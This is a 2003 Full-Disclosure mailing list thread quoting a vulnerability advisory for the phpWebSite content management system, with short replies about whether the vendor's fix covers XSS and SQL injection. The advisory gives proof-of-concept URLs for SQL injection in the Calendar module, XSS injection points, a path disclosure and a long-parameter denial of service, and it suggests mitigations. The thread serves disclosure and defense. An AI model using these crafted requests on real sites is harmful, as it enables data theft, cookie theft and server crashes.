Re: phpWebSite SQL Injection & DoS & XSS Vulnerabilities

["Darren Greene" <dg49379 () tux appstate edu>]

The fix posted on phpwebsite.appstate.edu fixes both XSS and SQL injections.

Darren

> Hi Jack,
> i was contacted by the phpWebSite team for release the fix.
> The fix is only for prevent the XSS attacks , theu are working now in
> fixes for the SQL Injections.
>
> best regards,
>
> > There is a fix for this available at phpWebSite's page (posted a
> short time
> > ago):
> > http://phpwebsite.appstate.edu/
> >
> > -Jack Whitsitt
> >
> >
> > ----- Original Message -----
> > From: "Lorenzo Hernandez Garcia-Hierro" <novappc () novappc com>
> > To: <full-disclosure () lists netsys com>
> > Sent: Sunday, August 10, 2003 6:15 PM
> > Subject: [Full-disclosure] phpWebSite SQL Injection & DoS & XSS
> > Vulnerabilities
> >
> >
> > > phpWebSite SQL Injection & DoS & XSS Vulnerabilities
> > > ------
> > > PRODUCT: phpWebSite
> > > VENDOR: Appalachian State University
> > > VULNERABLE VERSIONS:
> > >
> > >        - 0.9.x
> > >        - 0.8.x
> > >        - 0.7.x
> > >        - And older versions.
> > >
> > > NO VULNERABLE VERSIONS
> > >
> > > - ?
> > > ---------------------
> > >
> > > Description:
> > >
> > > phpWebSite provides a complete web site content management system.
> Web-
> > > based administration allows for easy maintenance of interactive,
> > > community-driven web sites.
> > >
> > > ---------------------------------------------
> > > |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
> > > ---------------------------------------------
> > >
> > > I encountered SQL Injection vulnerabilities in some of the
> phpWebSite
> > > modules , XSS ( Cross Site Scripting ) , Path Disclosures and a
> Denial
> > > of Service attack.
> > >
> > > -------------
> > > | SQL       |
> > > | INJECTION |
> > > -------------
> > >
> > > I encountered SQL Injection vulnerabilities in the Calendar module ,
> > > active in default configurations , that allows you
> > > to execute SQL queries in the target server with the privileges of
> the
> > > application user.
> > >
> > > When you send a special-crafted command url to the Calendar script
> you
> > > get a SQL error flag like this:
> > > __________________________________________________________________
> > > DB Error: syntax error
> > > select * from mod_calendar_events where ((startDate >= 2003\0
> [CRAFTED
> > > VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> > > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
> > > VALUE]0110)) and active=1 [nativecode=1064
> > > ** You have an error in your SQL syntax near
> > > '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110)
> or
> > > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
> > > ___________________________________________________________________
> > >
> > > This is an example error flag:
> > > ___________________________________________________________________
> > > DB Error: syntax error
> > > select * from mod_calendar_events where ((startDate >= 2003\0-10110
> and
> > > startDate <= 2003\0-10110) or
> > > (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
> > > [nativecode=1064
> > > ** You have an error in your SQL syntax near
> > > '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
> > > and endDate ' at line 1]
> > > ___________________________________________________________________
> > >
> > > For get this you must use this simple url:
> > >
> > > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > > =day&year=2003%00-1&month=
> > >
> > > And you get the SQL Error flag. The error occurs when the query
> > > includes the crafted value 2003[%00 = null]-1 .
> > > You can design a successful query for get configuration values or
> > > authentication data.
> > > I desgined an url that makes a successful query ( no hostile
> query ) :
> > > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > > =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%
> 20or%
> > > 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%
> 29%
> > > 29%20and%20active%3d1
> > >
> > > it is ( without url encoding ) :
> > >
> > > 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
> > > 20071205)) and active=1
> > >
> > > It is needed to have a little knowledge of SQL ( in this case ,
> MySQL )
> > > for make a successful attack.
> > >
> > > Other scripts of the Calendar module are affected by this hole ,
> when
> > > you send a crafted request like a + symbol at critical url variable
> > > value
> > > you get the "pure" sql server error flag and you can imagine ( i
> like
> > > this word ) a sql query for view private information of the
> application
> > > by
> > > looking at the error pages , like an try-error method.
> > >
> > > Another urls for probe are:
> > >
> > > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > > =day&month=0&year=<
> > >
> > > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > > =day&month=1%00&year=)SQL_INJECTION_FAKU
> > >
> > > ------------------
> > > | XSS            |
> > > | vulnerabilities|
> > > ------------------
> > >
> > > I encountered XSS security holes in some scripts of phpWebSite :
> > >
> > >
> > > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> > > =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
> > >
> > > http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
> > > =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
> > >
> > > http://[HOST]/[PATH]/index.php?
> > > module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK
> CODE]
> > > &MMN_position=[X:X]
> > >
> > > http://[HOST]/[PATH]/index.php?
> > > module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
> > >
> > >
> > > Note that the Calendar & PageMaster & Fatcat modules are affected
> > > COMPLETLY and all the script variables that are passed by url are
> > > affected too by this.
> > >
> > > When you access a hostile link with a xss attack in those scripts
> youur
> > > browser will execute the script commands.
> > > This can be use for steal cookies , authentication tokens and other
> > > private information.
> > > If your browser is vulnerable to other holes ( like MSIE ;-) you can
> > > have more problems...
> > >
> > > XSS AT SQL ERRORS:
> > >
> > > If you send a crafted url command with a XSS attack code to some of
> the
> > > scripts that are vulnerable against sql injection vulnerabilities ,
> the
> > > xss attack code will be executed
> > > in the error page.
> > >
> > >
> > > -----------------
> > > | PATH          |
> > > |  DISCLOSURES  |
> > > -----------------
> > >
> > > I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
> > > versions:
> > >
> > > - Sambar Server 5.2 beta
> > > - PHP 4.2.3 running as ISPAI module
> > > - MySQL NT [normal service] 3.23.56
> > > - Include_Path to the pear folder of phpwebsite
> > >
> > > Sending this:
> > >
> > > http://127.0.0.1/index.php?module=calendar&calendar[view]
> > > =month&month=11&year=9 # You can try other things and get the same #
> > >
> > > you get this:
> > >
> > > Warning: localtime(): invalid local time in
> > > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> > >
> > > Warning: localtime(): invalid local time in
> > > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> > >
> > > <- more than fifty repetitions of this warning ->
> > >
> > > It is a strange error , i think that it only occurs in MSWindows
> > > installations.
> > > Possible it occurs when the Pear library TimeZone.php script tries
> to
> > > convert the localdate in unix time stamp format.
> > >
> > > ------------------
> > > | DENIAL OF      |
> > > |  SERVICE       |
> > > ------------------
> > >
> > > There is a DoS/Buffer Overflow Attack in a script inside the
> Calendar
> > > module that allows you to crash the host running
> > > the MySQL server and the phpWebSite scripts ( must be the same
> > > computer ).
> > >
> > > This is a basic proof of concept for this vulnerability :
> > >
> > > http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar
> [view]=
> > > [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
> > >
> > > An attack like this causes a system global crash including the
> server
> > > service and the mysql service.
> > >
> > > -----------------
> > > |   SoLuTiOnS   |
> > > -----------------
> > >
> > > 1.- Be sure that the user of the phpWebSite database has only
> SELECT ,
> > > INSERT and UPDATE privileges in only the phpWebSite
> > >     database.
> > >
> > > 2.- Use the php function eregi_replace for prevent XSS attacks.
> > >
> > > 3.- Turn php_error_flags to Off .
> > >
> > > 4.- Use in addition an external module if you are using apache like
> > > mod_security .
> > >
> > > 5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
> > > computers , tcp/ip ,  netbios , games , asp ,
> > >     Apache......  nothing !
> > >     WARNING ;-) : ( paranoic solution... )
> > >
> > > -----------
> > > | CONTACT |
> > > -----------
> > >
> > > Lorenzo Hernandez Garcia-Hierro
> > > --- Computer Security Analyzer ---
> > > --Nova Projects Professional Coding--
> > > PGP: Keyfingerprint
> > > B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
> > > ID: 0x9C38E1D7
> > > **********************************
> > > www.novappc.com
> > > security.novappc.com
> > > www.lorenzohgh.com
> > > ______________________
> > >
> > > NSRG-20-7
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html